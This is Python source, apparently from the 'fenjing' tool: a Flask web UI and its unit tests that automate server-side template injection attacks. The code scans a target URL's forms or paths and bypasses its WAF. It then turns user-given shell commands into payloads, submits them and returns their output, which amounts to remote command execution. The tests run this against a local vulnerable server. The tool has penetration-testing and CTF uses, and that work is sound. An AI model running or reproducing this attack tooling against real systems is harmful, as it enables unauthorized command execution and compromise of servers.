    def callback_test_form_input(self, data):
        """收集测试表单的结果"""
        if not data["ok"]:
            return
        testsuccess_msg = (
            "payload测试成功！" if data["test_success"] else "payload测试失败。"
        )
        will_print_msg = "其会产生回显。" if data["will_print"] else "其不会产生回显。"
        self.messages.append(testsuccess_msg + will_print_msg)

    def __call__(self, callback_type, data):
        def default_handler(_):
            return logger.warning("callback_type=%s not found", callback_type)

        return {
            CALLBACK_PREPARE_FULLPAYLOADGEN: self.callback_prepare_fullpayloadgen,
            CALLBACK_GENERATE_FULLPAYLOAD: self.callback_generate_fullpayload,
            CALLBACK_GENERATE_PAYLOAD: self.callback_generate_payload,
            CALLBACK_SUBMIT: self.callback_submit,
            CALLBACK_TEST_FORM_INPUT: self.callback_test_form_input,
        }.get(callback_type, default_handler)(data)

class BaseCrackTaskThread(threading.Thread):
    def __init__(self):
        super().__init__()
        self.flash_messages = []
        self.messages = []
        self.callback = CallBackLogger(self.flash_messages, self.messages)
        self.success = False

class CrackTaskThread(BaseCrackTaskThread):
    """crack任务的线程，由webui调用并实际承载攻击任务"""

    def __init__(self, url, form: Form, interval: float, options: Options):
        super().__init__()
        self.form = form
        self.url = url
        self.options = options
        self.submitter: Union[Submitter, None] = None
        self.full_payload_gen: Union[FullPayloadGen, None] = None
        self.cracker: Union[Cracker, None] = None
        self.requester = HTTPRequester(interval=interval, user_agent=DEFAULT_USER_AGENT)

    def run(self):
        for input_field in self.form["inputs"]:
            self.messages.append(f"开始分析表单项{input_field}")
            self.submitter = FormSubmitter(
                self.url,
                self.form,
                input_field,
                self.requester,
                self.callback,
            )
            self.cracker = Cracker(
                self.submitter,
                self.callback,
                options=self.options,
            )
            if not self.cracker.has_respond():
                continue
            self.full_payload_gen = self.cracker.crack()
            if self.full_payload_gen:
                self.messages.append("WAF已绕过，现在可以执行Shell指令了")
                self.success = True
                break
        if not self.success:
            self.messages.append("WAF绕过失败")


class CrackPathTaskThread(BaseCrackTaskThread):
    """crack-path任务的线程，由webui调用并实际承载攻击任务"""

    def __init__(self, url, interval: float, options: Options):
        super().__init__()
        self.url = url
        self.options = options
        self.submitter: Union[Submitter, None] = None
        self.full_payload_gen: Union[FullPayloadGen, None] = None
        self.cracker: Union[Cracker, None]
        self.requester = HTTPRequester(interval=interval, user_agent=DEFAULT_USER_AGENT)

    def run(self):
        self.submitter = PathSubmitter(self.url, self.requester, self.callback)
        self.cracker = Cracker(self.submitter, self.callback, options=self.options)
        if not self.cracker.has_respond():
            self.messages.append("WAF绕过失败")
            return
        self.full_payload_gen = self.cracker.crack()
        if self.full_payload_gen:
            self.messages.append("WAF已绕过，现在可以执行Shell指令了")
            self.success = True

class ScanTaskThread(BaseCrackTaskThread):
    """scan任务的线程，由webui调用并实际承载攻击任务"""

    def __init__(self, url, interval: float, options: Options):
        super().__init__()
        self.url = url
        self.options = options
        self.submitter: Union[Submitter, None] = None
        self.full_payload_gen: Union[FullPayloadGen, None] = None
        self.cracker: Union[Cracker, None]
        self.requester = HTTPRequester(interval=interval, user_agent=DEFAULT_USER_AGENT)

    def run(self):
        url_forms = (
            (page_url, form)
            for (page_url, forms) in yield_form(self.requester, self.url)
            for form in forms
        )
        for page_url, form in url_forms:
            for input_field in form["inputs"]:
                self.messages.append(f"开始分析表单项{input_field}")
                self.submitter = FormSubmitter(
                    page_url,
                    form,
                    input_field,
                    self.requester,
                    self.callback,
                )
                self.cracker = Cracker(
                    self.submitter,
                    self.callback,
                    options=self.options,
                )
                if not self.cracker.has_respond():
                    continue
                self.full_payload_gen = self.cracker.crack()
                if self.full_payload_gen:
                    self.messages.append("WAF已绕过，现在可以执行Shell指令了")
                    self.success = True
                    return
        if not self.success:
            self.messages.append("WAF绕过失败")



class InteractiveTaskThread(threading.Thread):
    """表单攻击成功后，为给定shell指令生成payload的线程"""

    def __init__(
        self,
        submitter: Submitter,
        full_payload_gen: FullPayloadGen,
        cmd: str,
    ):
        super().__init__()
        self.submitter = submitter
        self.full_payload_gen = full_payload_gen
        self.cmd = cmd

        self.flash_messages = []
        self.messages = []
        self.callback = CallBackLogger(self.flash_messages, self.messages)

        self.submitter.callback = self.callback
        self.full_payload_gen.callback = self.callback

    def run(self):
        self.messages.append("开始生成payload")
        payload, will_print = self.full_payload_gen.generate(OS_POPEN_READ, self.cmd)
        if not payload:
            self.messages.append("payload生成失败")
            return
        if not will_print:
            self.messages.append("此payload不会产生回显")
        resp = self.submitter.submit(payload)
        assert resp is not None
        self.messages.append("提交payload的回显如下：")
        self.messages.append(resp.text)


def manage_task_thread(task: threading.Thread):
    """启动task(一个线程)，并为其分配一个id"""
    taskid = uuid.uuid4().hex
    task.daemon = True
    task.start()
    tasks[taskid] = task
    return taskid


def parse_options(request_form) -> Options:
    """从给定的字典中解析出options

    Args:
        request_form (dict): 给定的字典

    Returns:
        Options: 对应的option
    """
    options = Options()
    if request_form.get("detect_mode", None):
        options.detect_mode = DetectMode(request_form.get("detect_mode", None))
    if request_form.get("environment", None):
        options.environment = TemplateEnvironment(request_form.get("environment", None))
    if request_form.get("replaced_keyword_strategy", None):
        options.replaced_keyword_strategy = ReplacedKeywordStrategy(
            request_form.get("replaced_keyword_strategy", None)
        )
    return options


@app.route("/")
def index():
    """渲染主页"""
    return render_template("crack.jinja2")


@app.route("/crack-path")
def crack_path():
    """渲染攻击路径的页面"""
    return render_template("crack-path.jinja2")

@app.route("/scan")
def scan():
    """渲染攻击路径的页面"""
    return render_template("scan.jinja2")


@app.route(
    "/createTask",
    methods=["POST"],
)
def create_task():
    """创建攻击任务"""
    task_type = request.form.get("type", None)
    if task_type == "crack":
        if request.form["url"] == "" or request.form["inputs"] == "":
            return jsonify(
                {
                    "code": APICODE_WRONG_INPUT,
                    "message": "URL and inputs should not be empty, but you provide "
                    + f"url={request.form['url']} and inputs={request.form['inputs']}",
                }
            )
        taskid = manage_task_thread(
            CrackTaskThread(
                url=request.form["url"],
                form=get_form(
                    action=request.form["action"] or urlparse(request.form["url"]).path,
                    method=request.form["method"],
                    inputs=request.form["inputs"].split(","),
                ),
                interval=float(request.form["interval"]),
                options=parse_options(request.form),
            )
        )
        return jsonify({"code": APICODE_OK, "taskid": taskid})
    if task_type == "crack-path":
        if request.form["url"] == "":
            return jsonify(
                {"code": APICODE_WRONG_INPUT, "message": "URL should not be empty."}
            )
        taskid = manage_task_thread(
            CrackPathTaskThread(
                url=request.form["url"],
                interval=float(request.form["interval"]),
                options=parse_options(request.form),
            )
        )
        return jsonify({"code": APICODE_OK, "taskid": taskid})
    if task_type == "scan":
        if request.form["url"] == "":
            return jsonify(
                {"code": APICODE_WRONG_INPUT, "message": "URL should not be empty."}
            )
        taskid = manage_task_thread(
            ScanTaskThread(
                url=request.form["url"],
                interval=float(request.form["interval"]),
                options=parse_options(request.form),
            )
        )
        return jsonify({"code": APICODE_OK, "taskid": taskid})
    if task_type == "interactive":
        cmd, last_task_id = (
            request.form["cmd"],
            request.form["last_task_id"],
        )
        last_task = tasks.get(last_task_id, None)
        if cmd == "":
            return jsonify(
                {
                    "code": APICODE_WRONG_INPUT,
                    "message": "cmd should not be empty",
                }
            )
        elif not isinstance(last_task, BaseCrackTaskThread):
            return jsonify(
                {
                    "code": APICODE_WRONG_INPUT,
                    "message": f"last_task_id not found: {last_task_id}",
                }
            )
        elif not last_task.success:
            return jsonify(
                {
                    "code": APICODE_WRONG_INPUT,
                    "message": f"specified task failed: {last_task_id}",
                }
            )
        assert (
            last_task.submitter is not None and last_task.full_payload_gen is not None
        )
        taskid = manage_task_thread(
            InteractiveTaskThread(last_task.submitter, last_task.full_payload_gen, cmd)
        )
        return jsonify({"code": APICODE_OK, "taskid": taskid})
    return jsonify(
        {
            "code": APICODE_WRONG_INPUT,
            "message": f"unknown type {request.form.get('type', None)}",
        }
    )


@app.route(
    "/watchTask",
    methods=[
        "POST",
    ],
)
def watch_task():
    """异步获取任务（一个线程）的运行状态"""
    if "taskid" not in request.form:
        return jsonify({"code": APICODE_WRONG_INPUT, "message": "taskid not provided"})
    if request.form["taskid"] not in tasks:
        return jsonify(
            {
                "code": APICODE_WRONG_INPUT,
                "message": f"task not found: {request.form['taskid']}",
            }
        )
    taskid = request.form["taskid"]
    task: Union[CrackTaskThread, CrackPathTaskThread, InteractiveTaskThread] = tasks[
        taskid
    ]
    if isinstance(task, BaseCrackTaskThread):
        return jsonify(
            {
                "code": APICODE_OK,
                "taskid": taskid,
                "done": not task.is_alive(),
                "messages": task.messages,
                "flash_messages": task.flash_messages,
                "success": task.success,
            }
        )
    if isinstance(task, InteractiveTaskThread):
        return jsonify(
            {
                "code": APICODE_OK,
                "taskid": taskid,
                "done": not task.is_alive(),
                "messages": task.messages,
                "flash_messages": task.flash_messages,
            }
        )
    assert False, "This line should not be run, check code."


def should_open_browser() -> bool:
    if system() == "Windows":
        return True
    return environ.get("DISPLAY") is not None


def browser_open_url_delayed(url, delay):
    def f():
        time.sleep(delay)
        try:
            webbrowser.open(url)
        except webbrowser.Error:
            logger.warning("Open browser failed")

    t = threading.Thread(target=f)
    t.daemon = True
    t.start()


def main(host="127.0.0.1", port=11451, open_browser=True):
    """启动webui服务器"""
    if open_browser and should_open_browser():
        browser_open_url_delayed(f"http://{host}:{port}", 0.5)
    app.run(host=host, port=port)


if __name__ == "__main__":
    main()



# pylint: skip-file
# flake8: noqa

import sys

sys.path.append("..")

import time
import threading
import unittest
import os
import requests
from fenjing import webui, const

WEBUI_URL = "http://127.0.0.1:11451"
VULUNSERVER_URL = os.environ.get("VULUNSERVER_ADDR", "http://127.0.0.1:5000")

t = threading.Thread(target=webui.main, kwargs={"open_browser": False})
t.daemon = True
t.start()
time.sleep(0.5)


class TestWebui(unittest.TestCase):
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)

    def test_index(self):
        resp = requests.get(WEBUI_URL)
        self.assertEqual(resp.status_code, 200)
        self.assertIn("<!DOCTYPE html>", resp.text)

    def wait_for_task(self, task_id, task_type, max_time=60):
        start_time = time.perf_counter()
        while True:
            time.sleep(0.2)
            resp = requests.post(
                WEBUI_URL + "/watchTask",
                data={
                    "taskid": task_id,
                },
            )
            resp_data = resp.json()
            self.assertEqual(resp_data["code"], const.APICODE_OK)
            if resp_data["done"]:
                if task_type == "crack":
                    self.assertTrue(resp_data["success"])
                break
            self.assertLessEqual(time.perf_counter() - start_time, max_time)

    def general_task_test(self, request_data):
        resp = requests.post(WEBUI_URL + "/createTask", data=request_data)
        resp_data = resp.json()
        self.assertEqual(resp_data["code"], const.APICODE_OK)
        task_id = resp_data["taskid"]
        self.wait_for_task(task_id, "crack")

        resp = requests.post(
            WEBUI_URL + "/createTask",
            data={
                "type": "interactive",
                "last_task_id": task_id,
                "cmd": "echo test  webui",
            },
        )
        resp_data = resp.json()
        self.assertEqual(resp_data["code"], const.APICODE_OK)
        task_id = resp_data["taskid"]
        self.wait_for_task(task_id, "interact")

        resp = requests.post(
            WEBUI_URL + "/watchTask",
            data={
                "taskid": task_id,
            },
        )
        resp_data = resp.json()
        self.assertEqual(resp_data["code"], const.APICODE_OK)
        messages = resp_data["messages"]

        is_cmd_executed = any("test webui" in msg for msg in messages)
        self.assertTrue(is_cmd_executed)

    def test_crack(self):
        self.general_task_test(
            {
                "type": "crack",
                "url": VULUNSERVER_URL,
                "inputs": "name",
                "method": "GET",
                "action": "/",
                "interval": "0.02",
            }
        )

    def test_scan(self):
        self.general_task_test(
            {
                "type": "scan",
                "url": VULUNSERVER_URL,
                "interval": "0.02",
            }
        )

    def test_crack_path(self):
        self.general_task_test(
            {
                "type": "crack-path",
                "url": VULUNSERVER_URL + "/crackpath/",
                "interval": "0.02",
            }
        )
